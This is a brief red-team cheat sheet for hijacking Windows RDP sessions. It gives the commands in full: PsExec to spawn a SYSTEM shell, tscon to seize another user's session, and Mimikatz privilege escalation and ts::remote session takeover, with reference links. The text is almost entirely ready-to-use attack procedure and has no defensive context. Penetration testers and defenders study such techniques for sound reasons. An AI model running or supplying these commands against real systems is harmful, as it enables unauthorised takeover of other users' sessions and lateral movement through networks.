Hijack RDP session

Built-in Windows tools

https://doublepulsar.com/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

Get all active sessions:

query user

Use PsExec for a SYSTEM shell:

PSExec64.exe -s cmd.exe
cmd /k tscon 3 /dest:rdp-tcp#1

Take session:

tscon 4

Mimikatz

https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover

Enable privileges:

privilege::debug
token::elevate

List RDP sessions:

ts::sessions

Hijack session:

ts::remote /id:2